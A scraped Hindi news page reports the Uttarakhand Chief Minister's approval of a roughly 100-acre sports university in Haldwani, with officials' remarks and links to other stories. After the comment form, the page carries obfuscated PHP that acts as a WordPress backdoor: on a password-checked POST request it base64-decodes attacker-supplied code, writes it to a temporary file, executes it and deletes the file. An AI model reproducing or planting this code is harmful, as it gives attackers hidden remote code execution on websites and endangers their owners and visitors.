Uttarakhand: हल्द्वानी में खुलेगा उत्तराखंड का पहला खेल विश्वविद्यालय, सीएम ने दी सहमति

Uttarakhand Press News, 23 March 2023: मुख्यमंत्री पुष्कर सिंह धामी की अध्यक्षता में हुई बैठक में हल्द्वानी में खेल विश्वविद्यालय बनाने के लिए सैद्धांतिक सहमति बनी। मुख्यमंत्री ने कहा कि हल्द्वानी स्थित इंदिरा गांधी स्पोर्ट्स कांप्लेक्स को सम्मिलित करते हुए इसके लिए आसपास की जमीन चिह्नित की जाए। इससे स्पोर्ट्स कांप्लेक्स का उपयोग सुनिश्चित किया जा सकेगा। मुख्यमंत्री ने कहा कि खेल विश्वविद्यालय बनने से राज्य के युवाओं को खेल के क्षेत्र में अपनी प्रतिभा दिखाने के बेहतर अवसर प्राप्त होंगे।

बुधवार को सचिवालय में मुख्यमंत्री पुष्कर सिंह धामी की अध्यक्षता में राज्य में प्रस्तावित खेल विश्वविद्यालय के संबंध में बैठक हुई। बैठक में मुख्यमंत्री ने कहा कि खेल विश्वविद्यालय के लिए अवस्थापना सुविधाओं के विकास के साथ ही खेल एवं आवश्यक शैक्षणिक गतिविधियों के लिए इस क्षेत्र के विषय विशेषज्ञों के सुझाव लिए जाएं। इन सुझावों के आधार पर खेल विश्वविद्यालय की स्थापना के संबंध में अग्रिम कार्रवाई की जाए। उन्होंने कहा कि उत्तराखंड में खेल प्रतिभाओं की कमी नहीं है। राज्य में युवाओं को बेहतर खेल सुविधाएं उपलब्ध कराने के प्रयास किए जा रहे हैं।

बैठक की जानकारी देते हुए खेल मंत्री रेखा आर्या ने बताया कि यह खेल विश्वविद्यालय तकरीबन 100 एकड़ जमीन में बनेगा। खेल विश्वविद्यालय के एक्ट व नियमावली बनाने के लिए स्वर्णिम गुजरात स्पोर्ट्स यूनिवर्सिटी के उप कुलपति की सेवाएं लेने के संबंध में भी मुख्यमंत्री ने स्वीकृति प्रदान की है। उन्होंने मुख्यमंत्री का आभार जताते हुए कहा कि इससे प्रदेश की खेल प्रतिभाओं को निखारने के साथ ही उनका शैक्षिक व खेल का स्तर बेहतर बनाने में मदद मिलेगा। ये खिलाड़ी राष्ट्रीय व अंतरराष्ट्रीय स्तर पर बेहतर प्रदर्शन करते हुए देश और प्रदेश का नाम रोशन करेंगे। बैठक में मुख्य सचिव डॉ. एसएस संधु, अपर मुख्य सचिव राधा रतूड़ी, विशेष प्रमुख सचिव खेल अभिनव कुमार, सचिव आर मीनाक्षी सुंदरम, दिलीप जावलकर और अपर सचिव व निदेशक खेल जितेंद्र सोनकर समेत विभागीय अधिकारी उपस्थित थे।

Read Previous

Uttarakhand: दूसरे की जमीन बेचकर 1 करोड़ 11 लाख रुपये की ठगी, बुजुर्ग महिला समेत तीन गिरफ्तार

Read Next

17 लाख फेसबुक, 1.2 करोड़ WhatsApp यूजर्स को बनाया गया शिकार, देश का अब तक का सबसे बड़ा डाटा लीक

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}